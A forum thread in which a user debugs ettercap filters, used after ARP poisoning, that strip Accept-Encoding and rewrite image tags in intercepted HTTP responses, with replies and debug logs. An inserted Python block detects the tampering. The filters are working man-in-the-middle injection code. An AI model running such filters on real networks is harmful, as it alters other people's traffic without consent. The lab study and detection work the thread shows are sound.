Thread: ettercap + pcre_regex

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    5

    ettercap + pcre_regex filter vs own plugin

    Hello everyone.

    I am faced with the problem of implementing regular expression filters in ettercap. My research started from IronGeek's post "Fun with Ettercap Filters". That is quite a nice fun filter, and it works fine in my lab...

    The next step was improving it to replace not just:
    Code:
    <img src="image.png">
    <IMG SRC="image.png">
    but also:
    Code:
    <img id="32" class="cl1" src="image.png">
    To solve this I decided to use:
    to find patterns: regex(where, regex)
    to replace patterns: pcre_regex(where, pcre_regex ... )

    The short (and only) description of these functions I got from: man etterfilter and "Irongeek etterfilter man page"

    I'm not good at regular expressions, but after some reading I implemented this regular expression:
    search pattern: /i/g(<img.*[^>]src=['|"])(.*[^'"])(['|"])
    replace pattern: $1NEWImage.png$3


    Using a web regular-expression tester (for example regexter.com) I can successfully convert the HTML.

    After all this I decided to rewrite the filter described in the article above, and now it looks like:
    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
          msg(".");
       }
    }

    if (ip.proto == TCP && tcp.src == 80) {
       if (pcre_regex(DATA.data, "/i/g(<img.*[^>]src=['|\"])(.*[^'\"])(['|\"])", "$1tmp_image.png$3")) {
          msg("\n---> Perl regexp <---\n");
       }
    }
    But the filter does not work...
    As I can see in the log, ettercap says that this works fine:
    Code:
    replace("Accept-Encoding", "Accept-Rubbish!");
    but
    Code:
    pcre_regex(DATA.data, "/i/g(<img.*[^>]src=['|\"])(.*[^'\"])(['|\"])", "$1tmp_image.png$3")
    is just not found.

    I would very much appreciate it if you can help me!



    P.S.

    And last, but not least.
    My environment is:
    HP notebook: Windows
    VirtualBox: latest BT4 prefinal

    I'm using ettercap NG 0.7.3 and can successfully poison the ARP cache of my notebook.

  2. #2
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    5


    Ok.
    It seems I'm the only one with such idiotic thoughts about filtering...
    Nevertheless, as I can't debug the filter, I am thinking about writing my own plugin. I read some articles about writing plugins and tried to compile the dummy plugin, but in the BT4 distro I can't find the source files; then I tried searching for ettercap-dev (source etc.) in the repositories, but I was unable to find it, so I downloaded them from the official web site...
    After unpacking the source files I used the plugin sources to compile plugins and succeeded, but when I try to use the compiled dummy plugin in the ettercap NG which is supplied with BT4, it crashes...

    So, if anyone can tell me where I can find the BT4 ettercap NG source files, I would be grateful!

  3. #3
    Very good friend of the forum Gitsnik
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851


    Quote Originally Posted by Falcon(TFSoft)
    Ok.
    Seems to be I'm only one with such idiotic thoughts about filtering...
    Try cutting your regex back.
    Code:
    <img.[^>]*src=.[^>]*>
    Start with a simple one and bring it further up. That one will do your bog standard replacement, but it shouldn't matter where the src tag is. After that works you can start on the simple $1 replacements to adjust size etc.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  4. #4
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    5


    Sorry for the late post back, and thanks for the reply!

    So, I replaced the filter and now it looks like:

    Code:
    # Ask the server not to compress the response
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
          msg("<< Drop encoding \n");
       }
    }

    # Replace image tag
    if (ip.proto == TCP && tcp.src == 80) {
       if (pcre_regex(DATA.data, "<img")) {
          log(DATA.data, "/tmp/before.log");
          pcre_regex(DATA.data, "<img.[^>]*src=.[^>]*>", "nothing");
          log(DATA.data, "/tmp/after.log");
          msg(">> image replace \n");
       }
    }
    So, as I understand it, using this I will replace:
    Code:
    ... some html head body tags ...
    <img src='graphics/rate_star.png'></img>
    ... some closing html head body tags ...
    with this:
    Code:
    ... some html head body tags ...
    nothing</img>
    ... some closing html head body tags ...
    But in practice I got other results:
    1) the page load takes extra long
    2) the page content was only the one word "nothing"

    P.S.
    My debug logs contain this data:
    /tmp/before.log
    Code:
    HTTP/1.0 200 OK
    Date: Tue, 26 Jan 2010 22:11:42 GMT
    Server: Apache
    Last-Modified: Tue, 26 Jan 2010 22:11:34 GMT
    ETag: "21735e-b7-47e18919ad180"
    Accept-Ranges: bytes
    Content-Length: 183
    Content-Type: text/html
    X-Cache: MISS from server.org
    X-Cache-Lookup: HIT from server.org:8080
    Via: 1.0 server.org:8080 (squid)
    Connection: keep-alive
    
    ... some html head body tags ...
    <img src='graphics/rate_star.png'></img>
    ... some closing html head body tags ...
    /tmp/after.log

    Code:
    nothing
    P.P.S.
    Sorry for the mess with the HTML replace strings, but I can't post links.
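Seen from the monitoring side, the two logs above leave artifacts that are easy to spot in captured traffic: a request header renamed to the literal "Accept-Rubbish!" (the string this filter writes), and a response whose Content-Length still says 183 while the body is now the 7-byte string "nothing" (which is also why the browser sits waiting for bytes that never arrive). This added example is not from the thread or from ettercap; the HTTP messages are constructed to mirror the logs, and the checker assumes each message has been fully reassembled from the capture.

```python
# Constructed sample request: Accept-Encoding has been rewritten in flight to
# "Accept-Rubbish!", the literal the filter in this thread writes (constructed data).
TAMPERED_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: server.org\r\n"
    b"Accept-Rubbish!: gzip, deflate\r\n"
    b"Connection: keep-alive\r\n\r\n"
)
# Constructed sample response modelled on /tmp/after.log: the headers still
# declare the original 183 bytes, but the body was replaced by "nothing".
TAMPERED_RESPONSE = (
    b"HTTP/1.0 200 OK\r\n"
    b"Server: Apache\r\n"
    b"Content-Length: 183\r\n"
    b"Content-Type: text/html\r\n"
    b"Connection: keep-alive\r\n\r\n"
    b"nothing"
)
# Constructed untampered response for comparison (length matches the body).
CLEAN_RESPONSE = (
    b"HTTP/1.0 200 OK\r\n"
    b"Content-Length: 5\r\n"
    b"Content-Type: text/html\r\n\r\n"
    b"hello"
)

def parse_http(raw):
    """Split a complete raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body

def check_message(raw):
    """Return findings that point at in-flight modification of one HTTP message."""
    # Assumption: 'raw' is the whole message; on a truncated capture the
    # Content-Length comparison below would raise false positives.
    _, headers, body = parse_http(raw)
    findings = []
    # The published filter overwrites Accept-Encoding with this exact, non-standard name.
    if "accept-rubbish!" in headers:
        findings.append("request header rewritten: Accept-Encoding -> Accept-Rubbish!")
    # A body rewritten without fixing Content-Length leaves a measurable mismatch.
    declared = headers.get("content-length")
    if declared is not None and declared.isdigit() and int(declared) != len(body):
        findings.append("Content-Length %s does not match body of %d bytes" % (declared, len(body)))
    return findings
```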

  5. #5
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    5


    Maybe move these posts to the developers node? Or recreate it there?
